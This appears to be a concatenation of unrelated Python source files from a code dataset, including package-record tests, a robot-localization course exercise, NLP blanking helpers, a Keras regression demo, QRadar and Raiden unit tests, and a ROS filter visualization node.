subdir="win-32",
fn="austin-1.2.3-py34_2.tar.bz2",
constrains=(),
depends=(),
)
def test_index_record_timestamp(self):
# regression test for #6096
ts = 1507565728
new_ts = ts * 1000
rec = PackageRecord(
name='test-package',
version='1.2.3',
build='2',
build_number=2,
timestamp=ts
)
assert rec.timestamp == new_ts
assert rec.dump()['timestamp'] == new_ts
ts = 1507565728999
new_ts = ts
rec = PackageRecord(
name='test-package',
version='1.2.3',
build='2',
build_number=2,
timestamp=ts
)
assert rec.timestamp == new_ts
assert rec.dump()['timestamp'] == new_ts
| StarcoderdataPython |
1938384 | # ----------
# Background
#
# A robotics company named Trax has created a line of small self-driving robots
# designed to autonomously traverse desert environments in search of undiscovered
# water deposits.
#
# A Traxbot looks like a small tank. Each one is about half a meter long and drives
# on two continuous metal tracks. In order to maneuver itself, a Traxbot can do one
# of two things: it can drive in a straight line or it can turn. So to make a
# right turn, A Traxbot will drive forward, stop, turn 90 degrees, then continue
# driving straight.
#
# This series of questions involves the recovery of a rogue Traxbot. This bot has
# gotten lost somewhere in the desert and is now stuck driving in an almost-circle: it has
# been repeatedly driving forward by some step size, stopping, turning a certain
# amount, and repeating this process... Luckily, the Traxbot is still sending all
# of its sensor data back to headquarters.
#
# In this project, we will start with a simple version of this problem and
# gradually add complexity. By the end, you will have a fully articulated
# plan for recovering the lost Traxbot.
#
# ----------
# Part One
#
# Let's start by thinking about circular motion (well, really it's polygon motion
# that is close to circular motion). Assume that Traxbot lives on
# an (x, y) coordinate plane and (for now) is sending you PERFECTLY ACCURATE sensor
# measurements.
#
# With a few measurements you should be able to figure out the step size and the
# turning angle that Traxbot is moving with.
# With these two pieces of information, you should be able to
# write a function that can predict Traxbot's next location.
#
# You can use the robot class that is already written to make your life easier.
# You should re-familiarize yourself with this class, since some of the details
# have changed.
#
# ----------
# YOUR JOB
#
# Complete the estimate_next_pos function. You will probably want to use
# the OTHER variable to keep track of information about the runaway robot.
#
# ----------
# GRADING
#
# We will make repeated calls to your estimate_next_pos function. After
# each call, we will compare your estimated position to the robot's true
# position. As soon as you are within 0.01 stepsizes of the true position,
# you will be marked correct and we will tell you how many steps it took
# before your function successfully located the target bot.
# These import steps give you access to libraries which you may (or may
# not) want to use.
from robot import *
from math import sin, cos, acos, atan2
from matrix import *
import random
def state_from_measurements(three_measurements):
"""
Estimates state of robot from the last three measurements
Assumes each movement of robot is a "step" and a "turn"
Three measurements constitute two moves, from which turn angle, heading
and step size can be inferred.
"""
x1, y1 = three_measurements[-3]
x2, y2 = three_measurements[-2]
x3, y3 = three_measurements[-1]
# Last two position vectors from measurements
vec_1 = [x2 - x1, y2 - y1]
vec_2 = [x3 - x2, y3 - y2]
# Find last turning angle using dot product
dot = sum(v1*v2 for v1,v2 in zip(vec_1, vec_2))
mag_v1 = sqrt(sum(v**2 for v in vec_1))
mag_v2 = sqrt(sum(v**2 for v in vec_2))
v0 = mag_v2
w0 = acos(dot/(mag_v1*mag_v2))
theta0 = atan2(vec_2[1], vec_2[0]) + w0
x0 = x3 + v0*cos(theta0 + w0)
y0 = y3 + v0*sin(theta0 + w0)
return matrix([[x3], [y3], [theta0], [v0], [w0]])
def estimate_next_pos(measurement, OTHER = None):
"""Estimate the next (x, y) position of the wandering Traxbot
based on noisy (x, y) measurements.
Takes three measurements to find angle between last two steps and distance
"""
if OTHER is None:
# Store first measurement
OTHER = [measurement]
return ([measurement[0], measurement[1]], OTHER)
elif len(OTHER) == 1:
# Second measurement
OTHER.append(measurement)
return ([measurement[0], measurement[1]], OTHER)
else:
# Third and subsequent measurements
OTHER.append(measurement)
state = state_from_measurements(OTHER)
# Estimate next position from current state
x, y = state.value[0][0], state.value[1][0]
theta, v, w = state.value[2][0], state.value[3][0], state.value[4][0]
est_xy = [x + v*cos(theta),
y + v*sin(theta)]
return (est_xy, OTHER)
# A helper function you may find useful.
def distance_between(point1, point2):
"""Computes distance between point1 and point2. Points are (x, y) pairs."""
x1, y1 = point1
x2, y2 = point2
return sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
# This is here to give you a sense for how we will be running and grading
# your code. Note that the OTHER variable allows you to store any
# information that you want.
def demo_grading(estimate_next_pos_fcn, target_bot, OTHER = None):
localized = False
distance_tolerance = 0.01 * target_bot.distance
ctr = 0
# if you haven't localized the target bot, make a guess about the next
# position, then we move the bot and compare your guess to the true
# next position. When you are close enough, we stop checking.
while not localized and ctr <= 10:
ctr += 1
measurement = target_bot.sense()
position_guess, OTHER = estimate_next_pos_fcn(measurement, OTHER)
target_bot.move_in_circle()
true_position = (target_bot.x, target_bot.y)
error = distance_between(position_guess, true_position)
print(error)
if error <= distance_tolerance:
print("You got it right! It took you ", ctr, " steps to localize.")
localized = True
if ctr == 10:
print("Sorry, it took you too many steps to localize the target.")
return localized
# This is a demo for what a strategy could look like. This one isn't very good.
def naive_next_pos(measurement, OTHER = None):
"""This strategy records the first reported position of the target and
assumes that eventually the target bot will eventually return to that
position, so it always guesses that the first position will be the next."""
if not OTHER: # this is the first measurement
OTHER = measurement
xy_estimate = OTHER
return xy_estimate, OTHER
# This is how we create a target bot. Check the robot.py file to understand
# How the robot class behaves.
test_target = robot(2.1, 4.3, 0.5, 2*pi / 34.0, 1.5)
test_target.set_noise(0.0, 0.0, 0.0)
#demo_grading(naive_next_pos, test_target)
demo_grading(estimate_next_pos, test_target)
| StarcoderdataPython |
9707666 | __all__ = ['load', 'noise']
from . import load | StarcoderdataPython |
153734 | <filename>polyjuice/generations/create_blanks.py<gh_stars>10-100
import numpy as np
from ..helpers import unify_tags, flatten_fillins
from .special_tokens import BLANK_TOK
def create_blanked_sents(doc, indexes=None):
if indexes:
if type(indexes[0]) == int:
indexes = [indexes]
indexes_list = indexes #[indexes]
else:
indexes_list = get_random_idxes(
doc, is_token_only=False, max_count=3)
blanks = set([flatten_fillins(
doc, indexes, [BLANK_TOK] * len(indexes)) \
for indexes in indexes_list])
return blanks
# the function for placing BLANKS.
def get_one_random_idx_set(
doc, max_blank_block=3, req_dep=None, blank_type_prob=None,
pre_selected_idxes=None, is_token_only=False):
if req_dep is not None:
if type(req_dep) == str: req_dep = [req_dep]
idx_range = [i for i, token in enumerate(doc) if token.dep_ in req_dep or unify_tags(token.dep_) in req_dep]
else:
idx_range = list(range(len(doc)))
# only keep those pre_selected_idxes
if pre_selected_idxes is not None:
idx_range = [i for i in idx_range if i in pre_selected_idxes]
max_blank_block = min(len(idx_range), max_blank_block)
#print(req_dep, idx_range)
selected_indexes = []
while max_blank_block > 0 and not selected_indexes:
# if fixed the thing to change, then do one specific change
n_perturb = np.random.choice(list(range(1, max_blank_block+1))) #if req_dep is None else 1
replace_idx, total_run = -1, 1000
while (total_run > 0 and n_perturb > 0): #and len(span_and_edits) == 0:
replace_idx = np.random.choice(idx_range)
token = doc[replace_idx]
if token.is_punct:
total_run -= 1
continue
if blank_type_prob: p = blank_type_prob
else:
# if fixed the tree, then mostly use the tree
if is_token_only: p = [0.7, 0, 0.3]
elif req_dep is None: p = [0.4, 0.35, 0.25]
else: p = [0.1, 0.7, 0.2]
is_replace_subtree = np.random.choice(["token", "subtree", "insert"], p=p)
if is_replace_subtree == "subtree":
start, end = token.left_edge.i, token.right_edge.i+1
elif is_replace_subtree == "token":
start, end = token.i, token.i+1
else:
start, end = token.i, token.i
if all([end < sstart or start > send for sstart, send in selected_indexes]):
selected_indexes.append([start, end])
n_perturb -= 1
total_run -= 1
return sorted(selected_indexes, key=lambda idx: (idx[0], idx[1]))
def get_random_idxes(doc,
pre_selected_idxes=None,
deps=None, is_token_only=False,
max_blank_block=3, max_count=None):
unique_blanks = {str([[0, len(doc)]]): [[0, len(doc)]]}
default_deps = [None, "", ["subj","obj"], ["aux", "ROOT"], ["conj", "modifier", "clause"]]
if is_token_only:
unique_blanks = {}
if deps is None: deps = default_deps
for dep in deps:
# for each different dep, get some blank
rounds = 1 if dep is not None else 2
if is_token_only:
rounds = 5
for _ in range(rounds):
curr_idx = get_one_random_idx_set(
doc, req_dep=dep,
max_blank_block=max_blank_block,
pre_selected_idxes=pre_selected_idxes,
is_token_only=is_token_only) if dep != "" else None
if curr_idx is not None:
unique_blanks[str(curr_idx)] = curr_idx
unique_blanks = list(unique_blanks.values())
if max_count is not None:
try:
unique_blanks = list(np.random.choice(
np.array(unique_blanks, dtype="object"),
min(len(unique_blanks), max_count),
replace=False))
except:
unique_blanks = unique_blanks[:max_count]
return unique_blanks
| StarcoderdataPython |
369372 | <filename>Machine learning/ML/supervised_ML_Deep_learning/tf_1.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from sklearn.metrics import mean_squared_error
# ---------------------------
# let's create data with a broadly linear shape (where linear is delivered by a linear regression y = mx + b + noise)
# ------
m =2
b =3
x = np.linspace(0,50,100)
np.random.seed(101)
noise = np.random.normal(loc=0, scale=4, size=len(x)) #loc is mean, scale is std, size is how many values, which is 100 values from x
#predict y
y = (2*x) + b + noise
# plt.plot(x, y, '*') # where * is to have x and y crossing
# plt.show()
# let's create a keras model with dense layers
# ------
# chose model and add layers => input, hidden and output
# number is the total neurons to deploy, activation is activation function, inpout dimension is x only one variable
model = keras.Sequential(
[
layers.Dense(4, input_shape=(1,), activation="relu", name="layer1"),
layers.Dense(4, activation="relu", name="layer2"),
layers.Dense(1, name="layer3"),
]
)
#create weights into the model => build it => return a tensor
a = tf.ones((1, 1))
b = model(a)
print("----------")
print("Number of weights after calling the model:", len(model.weights))
# compile the model and see the summary details
model.compile(loss='mse', optimizer='adam')
model.summary()
# # fit the model
# # ------
# # epochs will depend on how big the dataset, etc.
model.fit(x, y, epochs=250)
# see model results
# ------
# to see the progress of the loss function
loss = model.history.history['loss']
# print(loss)
# #to plot the evolution of the model vs loss function
epochs = range(len(loss))
# plt.plot(epochs, loss)
# plt.show()
# now run the regression against the data (=full forecast)
# ------
predictions = model.predict(x)
plt.plot(x,y, '*')
plt.plot(x, predictions, 'r')
plt.show()
# verify errors
# ------
mse = mean_squared_error(y, predictions)
print(mse) | StarcoderdataPython |
135758 | _iterable = ['danilo', 'daniel', 'lucas', 'matheus', 'luana', 'claudiane', 'luan']
alfa = [chr(l) for l in range(ord('a'), ord('z')+1]
for name1 in range(len(_iterable)):
for name2 in range(name1+1, len(_iterable)):
c = 0
while True:
if alfa.index(_iterable[name1][c]) != alfa.index(_iterable[name2][c]):
if alfa.index(_iterable[name1][c]) > alfa.index(_iterable[name2][c]):
_iterable.insert(name1, _iterable.pop(name2))
break
if set(_iterable[name1]).difference(set(_iterable[name2])) == set():
if len(_iterable[name1]) < len(_iterable[name2]):
small = name1
pos = name2
else:
small = name2
pos = name1
_iterable.insert(pos, _iterable.pop(small))
break
c += 1
print(_iterable)
print(sorted(_iterable))
| StarcoderdataPython |
6662291 | import importlib
import numpy as np
from copy import deepcopy
from types import ModuleType
# from .utils import get_logger
# logger = get_logger(__name__)
import logging
logger = logging.getLogger(__name__)
import thermal_history as th
from .model_classes import ThermalModel
def setup_model(parameters, core_method = None,
stable_layer_method = None,
mantle_method = None,
verbose=True,
log_file='out.log'):
'''Setup main model
Parameters
----------
parameters : Parameters class
Instance of Parameters class
core_method : String, optional
Name of method to solve for the core, by default None
stable_layer_method : String, optional
Name of method to solve for the stable layer, by default None
mantle_method : String, optional
Name of method to solve for the mantle, by default None
verbose : bool, optional
If True, progress information will be printed to STDOUT, by default True
log_file : String, optional
name of the log file, by default out.log
Returns
-------
ThermalModel
Instance of the main model class using the given methods and parameters
Raises
------
ValueError
If a region is specified in the parameters but no method is given in the corresponding keyword argument
ValueError
If a specified method cannot be imported
'''
methods = {'core': core_method,
'stable_layer': stable_layer_method,
'mantle': mantle_method}
#Check that supplied methods are consistent with regions specified in parameters
for key, r in methods.items():
if r == None and getattr(parameters, key):
raise ValueError(f'{key} is set to True in parameters but a method has not been specified for it')
elif type(r)==str and not getattr(parameters, key):
if verbose:
print(f'{key} is set to False in parameters but a method has been specified for that region. Ignoring method specified.')
methods[key] = None
required_params = {}
optional_params = {}
regions = [x for x in methods.keys() if getattr(parameters, x)]
#Check each region and import the relevant python module and add to methods dict.
for r in regions:
required_params[r] = {}
optional_params[r] = {}
if hasattr(parameters, r):
if getattr(parameters, r):
try:
methods[r] = importlib.import_module(f'thermal_history.{r}_models.{methods[r]}.main')
except Exception as e:
raise ValueError(f'{e}\nCannot import thermal_history.{r}_models.{methods[r]}.main')
#Get required parameters from method 'r' and append to full required params dict
try:
required_params[r].update(methods[r].required_params)
except:
raise ValueError(f'No required_params defined in {methods[r]}')
#Add optional parameters as well if they exist
if hasattr(methods[r], 'optional_params'):
optional_params[r].update(methods[r].optional_params)
else:
raise ValueError(f'{r} is set to False in parameters')
else:
raise ValueError(f'{r} not set to True or False in parameters')
assert len(regions) > 0, 'No models specified'
#Check that all necessary inputs have been specified in parameters.
th.utils.check_parameters(parameters, regions, required_params, optional_params, verbose=verbose)
#Set optional parameters to their default values if not set in parameter file
for r in regions:
for key, value in optional_params[r].items():
if not hasattr(parameters, key):
setattr(parameters, key, value[1])
return ThermalModel(parameters, methods, verbose=verbose, log_file=log_file)
class Parameters:
'''Parameters class
An instance of this class contains all of the parameters and is accesible to the main model
'''
ys = 60*60*24*365 #Seconds in a year
ev = 1.602e-19 #Electron volt
kb = 1.3806485e-23 #Boltzmanns constant
G = 6.67e-11 #Gravitational Constant
Na = 6.022140857e23 #Avogadros Constant
Rg = 8.31446261815324 #Gas constant
def __init__(self, parameters, folder='', copy=False):
'''Initialises the class with input files
Parameters
----------
parameters : str/list/tuple
A string or list/tuple of strings with the filenames of the parameter files. If copy is True then this can be another Parameters instance.
folder : str, optional
folder the parameters files exist in, to save typing out the full relative file path for each.
copy : bool, optional
If True, the parameters argument is instead taken to be another Parameters instance and a copy of it is returned, by default False
Raises
------
ValueError
If a parameter is specified twice with different values
'''
# if copy:
# for key in parameters.__dict__.keys():
# setattr(self, key, deepcopy(getattr(parameters, key)))
# else:
if not copy:
assert type(parameters) in [str,list,tuple], 'input parameters must be a single string or list/tuple'
if type(parameters) == str:
parameters = [parameters]
params = list(parameters)
#Make sure folder has a trailing slash
if len(folder)>1 and not folder[-1] == '/':
folder+='/'
for i,p in enumerate(params):
if type(p) == str:
spec = importlib.util.spec_from_file_location('params'+str(i+1), folder+p)
params[i] = importlib.util.module_from_spec(spec)
spec.loader.exec_module(params[i])
else:
#An exisiting parameters class has been provided
params = [parameters]
for prm in params:
keys = [key for key in prm.__dict__.keys() if ('__' not in key and not type(getattr(prm,key))==ModuleType)]
for key in keys:
value = deepcopy(getattr(prm,key))
if type(value)==list: #Lists should be converted to arrays
value = np.array(value)
if not hasattr(self,key):
setattr(self, key, value)
elif not value == getattr(self,key):
v1, v2 = getattr(self,key), value
raise ValueError('multiple instances of {} in provided parameters files: \n{}\n{}'.format(key,v1,v2))
| StarcoderdataPython |
3206042 | <reponame>mrillusi0n/compete
def digit_set(n):
ds = set()
while n:
ds.add(n % 10)
n //= 10
return ds
def get_next(n):
global NUMS
discarded = digit_set(n)
res = 0
while res in NUMS or digit_set(res).intersection(discarded):
# print(f'Checking {res}...')
# print(digit_set(res).intersection(discarded))
res += 1
NUMS.add(res)
return res
nums = [i for i in range(11)]
NUMS = set(nums)
for _ in range(490):
nums.append(get_next(nums[-1]))
print(nums[11]) # read the given index and supply here
| StarcoderdataPython |
4845930 | <filename>experiments/__init__.py
import os
import pkgutil
import importlib
from core.experiments import Experiment
experiments_by_name = {}
pkg_dir = os.path.dirname(__file__)
for (module_loader, name, ispkg) in pkgutil.iter_modules([pkg_dir]):
importlib.import_module('.' + name, __package__)
all_subclasses = Experiment.__subclasses__() + [s for ss in [s.__subclasses__() for s in Experiment.__subclasses__()] for s in ss]
experiments_by_name = {cls.name: cls for cls in all_subclasses if hasattr(cls, 'name')}
def get_experiment_by_name(exp_name):
return experiments_by_name[exp_name]
| StarcoderdataPython |
4872218 | #encoding: utf-8
#
# Unit tests for function_utils.py
#
from fn_qradar_integration.util import function_utils
def test_query_string():
"""
test the make_query_string function and verify that the substitution works fine
:return:
"""
# One test with real data
input_string = "SELECT %param1% FROM events WHERE INOFFENSE(%param2%) LAST %param3% MINUTES"
params = ["DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm') as StartTime, CATEGORYNAME(category), LOGSOURCENAME(logsourceid), PROTOCOLNAME(protocolid), RULENAME(creeventlist)",
"38",
"100"]
query_str = function_utils.make_query_string(input_string, params)
str_expect = "SELECT DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm') as StartTime, CATEGORYNAME(category), LOGSOURCENAME(logsourceid), PROTOCOLNAME(protocolid), RULENAME(creeventlist)" \
" FROM events WHERE INOFFENSE(38) LAST 100 MINUTES"
assert query_str == str_expect
# one more random test
str1 = "First part string "
str2 = " Second part string "
str3 = " Third part string "
str4 = " Forth part string "
str5 = " Fifth part string "
input_string = str1 + "%param1%" + str2 + "%param2%" + str3 + "%param3%" + str4 + "%param4%" + str5
params = ["Param1", "Param2", "Param3", "Param4"]
query_str = function_utils.make_query_string(input_string, params=params)
str_expect = str1 + params[0] + str2 + params[1] + str3 + params[2] + str4 + params[3] + str5
assert query_str == str_expect
def test_fix_dict():
"""
:return:
"""
input_dict = {"key1": 10,
"key2": "string",
"key3": ["l1", "l2"],
"key4": {"k1": "v1",
"k2": "v2"},
"key5": "çø∂",
"key6": u"çø∂",
"key7": [u"çø∂", "çø∂"]}
ret_dicts = function_utils.fix_dict_value([input_dict])
assert ret_dicts[0]["key1"] == "10"
assert ret_dicts[0]["key2"] == "string"
assert ret_dicts[0]["key3"] == str(input_dict["key3"])
assert ret_dicts[0]["key4"] == str(input_dict["key4"])
assert ret_dicts[0]["key5"] == "çø∂"
assert ret_dicts[0]["key6"] == u"çø∂"
assert ret_dicts[0]["key7"]
| StarcoderdataPython |
6574922 | import pytest
from eth_utils import to_checksum_address
from raiden.api.python import RaidenAPI
from raiden.exceptions import (
DepositMismatch,
InvalidSettleTimeout,
TokenNotRegistered,
UnexpectedChannelState,
UnknownTokenAddress,
)
from raiden.tests.utils.detect_failure import raise_on_failure
from raiden.tests.utils.events import must_have_event, wait_for_state_change
from raiden.tests.utils.factories import make_address
from raiden.tests.utils.transfer import get_channelstate
from raiden.transfer import channel, views
from raiden.transfer.state import ChannelState, NetworkState
from raiden.transfer.state_change import ContractReceiveChannelSettled
from raiden_contracts.constants import ChannelEvent
@raise_on_failure
@pytest.mark.parametrize("number_of_nodes", [2])
@pytest.mark.parametrize("number_of_tokens", [1])
def test_token_addresses(raiden_network, token_addresses):
"""
Test that opening a channel via the API provides the confirmed block and not
the latest block. The discrepancy there lead to potential timing issues where
the token network was deployed for the state in the "latest" block but not yet
in the confirmed state and a BadFunctionCallOutput exception was thrown from web3.
Regression test for 4470
"""
app0, app1 = raiden_network
token_address = token_addresses[0]
# Find block where the token network was deployed
token_network_address = views.get_token_network_address_by_token_address(
views.state_from_app(app0), app0.raiden.default_registry.address, token_address
)
last_number = app0.raiden.rpc_client.block_number()
for block_number in range(last_number, 0, -1):
code = app0.raiden.rpc_client.web3.eth.getCode(
to_checksum_address(token_network_address), block_number
)
if code == b"":
break
token_network_deploy_block_number = block_number + 1
api0 = RaidenAPI(app0.raiden)
# Emulate the confirmed block being a block where TokenNetwork for token_address
# has not been deployed.
views.state_from_raiden(app0.raiden).block_hash = app0.raiden.rpc_client.get_block(
token_network_deploy_block_number - 1
)["hash"]
msg = (
"Opening a channel with a confirmed block where the token network "
"has not yet been deployed should raise a TokenNotRegistered error"
)
with pytest.raises(TokenNotRegistered):
api0.channel_open(
registry_address=app0.raiden.default_registry.address,
token_address=token_address,
partner_address=app1.raiden.address,
)
pytest.fail(msg)
def run_test_token_addresses(raiden_network, token_addresses):
app = raiden_network[0]
api = RaidenAPI(app.raiden)
registry_address = app.raiden.default_registry.address
assert set(api.get_tokens_list(registry_address)) == set(token_addresses)
@raise_on_failure
@pytest.mark.parametrize("number_of_nodes", [2])
@pytest.mark.parametrize("channels_per_node", [0])
def test_raidenapi_channel_lifecycle(
raiden_network, token_addresses, deposit, retry_timeout, settle_timeout_max
):
"""Uses RaidenAPI to go through a complete channel lifecycle."""
node1, node2 = raiden_network
token_address = token_addresses[0]
token_network_address = views.get_token_network_address_by_token_address(
views.state_from_app(node1), node1.raiden.default_registry.address, token_address
)
api1 = RaidenAPI(node1.raiden)
api2 = RaidenAPI(node2.raiden)
registry_address = node1.raiden.default_registry.address
# nodes don't have a channel, so they are not healthchecking
assert api1.get_node_network_state(api2.address) == NetworkState.UNKNOWN
assert api2.get_node_network_state(api1.address) == NetworkState.UNKNOWN
assert not api1.get_channel_list(registry_address, token_address, api2.address)
# Make sure invalid arguments to get_channel_list are caught
with pytest.raises(UnknownTokenAddress):
api1.get_channel_list(
registry_address=registry_address, token_address=None, partner_address=api2.address
)
address_for_lowest_settle_timeout = make_address()
lowest_valid_settle_timeout = node1.raiden.config["reveal_timeout"] * 2
# Make sure a small settle timeout is not accepted when opening a channel
with pytest.raises(InvalidSettleTimeout):
api1.channel_open(
registry_address=node1.raiden.default_registry.address,
token_address=token_address,
partner_address=address_for_lowest_settle_timeout,
settle_timeout=lowest_valid_settle_timeout - 1,
)
# Make sure a the smallest settle timeout is accepted
api1.channel_open(
registry_address=node1.raiden.default_registry.address,
token_address=token_address,
partner_address=address_for_lowest_settle_timeout,
settle_timeout=lowest_valid_settle_timeout,
)
address_for_highest_settle_timeout = make_address()
highest_valid_settle_timeout = settle_timeout_max
# Make sure a large settle timeout is not accepted when opening a channel
with pytest.raises(InvalidSettleTimeout):
api1.channel_open(
registry_address=node1.raiden.default_registry.address,
token_address=<PASSWORD>_address,
partner_address=address_for_highest_settle_timeout,
settle_timeout=highest_valid_settle_timeout + 1,
)
# Make sure the highest settle timeout is accepted
api1.channel_open(
registry_address=node1.raiden.default_registry.address,
token_address=token_address,
partner_address=address_for_highest_settle_timeout,
settle_timeout=highest_valid_settle_timeout,
)
# open is a synchronous api
api1.channel_open(node1.raiden.default_registry.address, token_address, api2.address)
channels = api1.get_channel_list(registry_address, token_address, api2.address)
assert len(channels) == 1
channel12 = get_channelstate(node1, node2, token_network_address)
assert channel.get_status(channel12) == ChannelState.STATE_OPENED
channel_event_list1 = api1.get_blockchain_events_channel(
token_address, channel12.partner_state.address
)
assert must_have_event(
channel_event_list1,
{
"event": ChannelEvent.OPENED,
"args": {
"participant1": to_checksum_address(api1.address),
"participant2": to_checksum_address(api2.address),
},
},
)
network_event_list1 = api1.get_blockchain_events_token_network(token_address)
assert must_have_event(network_event_list1, {"event": ChannelEvent.OPENED})
registry_address = api1.raiden.default_registry.address
# Check that giving a 0 total deposit is not accepted
with pytest.raises(DepositMismatch):
api1.set_total_channel_deposit(
registry_address=registry_address,
token_address=token_address,
partner_address=api2.address,
total_deposit=0,
)
# Load the new state with the deposit
api1.set_total_channel_deposit(
registry_address=registry_address,
token_address=token_address,
partner_address=api2.address,
total_deposit=deposit,
)
# let's make sure it's idempotent. Same deposit should raise deposit mismatch limit
with pytest.raises(DepositMismatch):
api1.set_total_channel_deposit(registry_address, token_address, api2.address, deposit)
channel12 = get_channelstate(node1, node2, token_network_address)
assert channel.get_status(channel12) == ChannelState.STATE_OPENED
assert channel.get_balance(channel12.our_state, channel12.partner_state) == deposit
assert channel12.our_state.contract_balance == deposit
assert api1.get_channel_list(registry_address, token_address, api2.address) == [channel12]
# there is a channel open, they must be healthchecking each other
assert api1.get_node_network_state(api2.address) == NetworkState.REACHABLE
assert api2.get_node_network_state(api1.address) == NetworkState.REACHABLE
event_list2 = api1.get_blockchain_events_channel(
token_address, channel12.partner_state.address
)
assert must_have_event(
event_list2,
{
"event": ChannelEvent.DEPOSIT,
"args": {"participant": to_checksum_address(api1.address), "total_deposit": deposit},
},
)
api1.channel_close(registry_address, token_address, api2.address)
# Load the new state with the channel closed
channel12 = get_channelstate(node1, node2, token_network_address)
event_list3 = api1.get_blockchain_events_channel(
token_address, channel12.partner_state.address
)
assert len(event_list3) > len(event_list2)
assert must_have_event(
event_list3,
{
"event": ChannelEvent.CLOSED,
"args": {"closing_participant": to_checksum_address(api1.address)},
},
)
assert channel.get_status(channel12) == ChannelState.STATE_CLOSED
with pytest.raises(UnexpectedChannelState):
api1.set_total_channel_deposit(
registry_address, token_address, api2.address, deposit + 100
)
assert wait_for_state_change(
node1.raiden,
ContractReceiveChannelSettled,
{
"canonical_identifier": {
"token_network_address": token_network_address,
"channel_identifier": channel12.identifier,
}
},
retry_timeout,
)
| StarcoderdataPython |
6531316 | <gh_stars>1-10
"""The __init__.py for 'routes' which contains the only permit for functions' sharing.
"""
from .base import setup_routes
# Admitting permit for usage in other modules to the setup_routes only.
__all__ = ('setup_routes',) | StarcoderdataPython |
4979937 | # Author: <NAME>
# Date : 2022/03/28
"""Package containing jinja templates used by mdev.project."""
| StarcoderdataPython |
5195604 | #!/usr/bin/python
# author luke
import re
ret = re.match("[A-Z][a-z]*","MM")
print(ret.group())
ret = re.match("[A-Z][a-z]*","MnnM")
print(ret.group())
ret = re.match("[A-Z][a-z]*","Aabcdef")
print(ret.group())
print('-'*50)
# 需求:匹配出,变量名是否有效
names = ["name1", "_name", "2_name", "__name__"]
for name in names:
ret = re.match("[a-zA-Z_]+[\w]*",name)
if ret:
print("变量名 %s 符合要求" % ret.group())
else:
print("变量名 %s 非法" % name)
print('-'*50)
# 需求:匹配出,0到99之间的数字
#coding=utf-8
import re
ret = re.match("[1-9]?[0-9]","7")
print(ret.group())
ret = re.match("[1-9]?\d","33")
print(ret.group())
#匹配0-99,不要01和09
ret = re.match("[1-9]?\d$","9")
print(ret.group())
print('-'*50)
#匹配m个字符
ret = re.match("[a-zA-Z0-9_]{6}","12a3g45678")
print(ret.group())
ret = re.match("[a-zA-Z0-9_]{8,20}","1ad12f23s34455ff6677777777")
print(ret.group()) | StarcoderdataPython |
3241869 | #!/usr/bin/env python2
from __future__ import print_function
import roslib
import sys
import rospy
import numpy as np
import datetime
import time
from geometry_msgs.msg import PoseArray
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseWithCovariance
from nav_msgs.msg import Odometry
from dse_msgs.msg import PoseMarkers
from std_msgs.msg import Float64MultiArray
from std_msgs.msg import MultiArrayLayout
from std_msgs.msg import MultiArrayDimension
from dse_msgs.msg import InfFilterResults
from visualization_msgs.msg import Marker
from scipy.spatial.transform import Rotation as R
from gazebo_msgs.msg import LinkStates
import tf_conversions
import tf2_ros
import dse_lib
import dse_constants
roslib.load_manifest('dse_simulation')
class information_filter:
# Define initial/setup values
def __init__(self):
# Get parameters from launch file
self.ros_prefix = rospy.get_param('~prefix')
if len(self.ros_prefix) != 0 and self.ros_prefix[0] != '/':
self.ros_prefix = '/' + self.ros_prefix
self.tf_pretix = self.ros_prefix[1:]
self.this_agent_id = rospy.get_param('~id')
self.dim_state = rospy.get_param('~dim_state')
# self.ros_prefix = '/tb3_0'
# self.tf_pretix = self.ros_prefix[1:]
# self.this_agent_id = 5
# self.dim_state = 6
self.camera_pose_sub = rospy.Subscriber(self.ros_prefix + "/dse/pose_markers", PoseMarkers, self.measurement_callback)
self.inf_results_sub = rospy.Subscriber(self.ros_prefix + "/dse/inf/results", InfFilterResults, self.results_callback)
self.meas_vis_pub = rospy.Publisher(self.ros_prefix + "/dse/vis/measurement", PoseArray, queue_size=10)
self.est_ids = []
self.est_vis_pubs = []#rospy.Publisher(self.ros_prefix + "/dse/vis/estimates", PoseArray, queue_size=10)
if self.dim_state == 6:
self.dim_obs = 3
elif self.dim_state == 12:
self.dim_obs = 6
else:
rospy.signal_shutdown('invalid state dimension passed in')
# Define static variables
self.dt = 0.1
self.t_last = rospy.get_time()
self.gzbo_ref_obj_state = None
self.pthn_ref_obj_state = None
# Create pose_array for measurement data
def measurement_callback(self, data):
poses = PoseArray()
for pose_stamped in data.pose_array:
poses.poses += [pose_stamped.pose.pose]
poses.header.stamp = rospy.Time.now()
if self.ros_prefix == '':
poses.header.frame_id = 'odom'
else:
poses.header.frame_id = self.tf_pretix + '/odom'
self.meas_vis_pub.publish(poses)
# Create pose_array for the information results
def results_callback(self, data):
inf_id_list = np.array(data.ids)
inf_Y = dse_lib.multi_array_2d_output(data.inf_matrix)
inf_y = dse_lib.multi_array_2d_output(data.inf_vector)
self.inf_x = np.linalg.inv(inf_Y).dot(inf_y)
inf_P = np.linalg.inv(inf_Y)
inf_P[inf_P < 0] = 0
inf_P = np.sqrt(inf_P)
odom = Odometry()
odom.header.stamp = rospy.Time.now()
odom.header.frame_id = self.tf_pretix + '/odom'
# if self.ros_prefix == '':
# odom.header.frame_id = 'base_footprint'
# else:
# odom.header.frame_id = self.tf_pretix + '/base_footprint'
for id in inf_id_list:
if id not in self.est_ids:
self.est_ids.append(id)
self.est_vis_pubs.append(rospy.Publisher(self.ros_prefix + "/dse/vis/estimates/" + str(id), Odometry, queue_size=10))
for id in inf_id_list:
i = np.where(inf_id_list == id)[0][0]
j = self.est_ids.index(id)
i_min = i * self.dim_state
i_max = i_min + self.dim_state
odom.pose.pose = dse_lib.pose_from_state_3D(self.inf_x[i_min:i_max])
cov = dse_lib.sub_matrix(inf_P, inf_id_list, id, self.dim_state)
cov = dse_lib.state_cov_to_covariance_matrix(cov)
odom.pose.covariance = list(dse_lib.covariance_to_ros_covariance(cov))
self.est_vis_pubs[j].publish(odom)
def main(args):
rospy.init_node('dse_gazebo_visualization_node', anonymous=True)
imf = information_filter()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
if __name__ == '__main__':
main(sys.argv)
| StarcoderdataPython |
3483717 | <gh_stars>10-100
class Queue:
# initialize your data structure here.
def __init__(self):
self.q1 = []
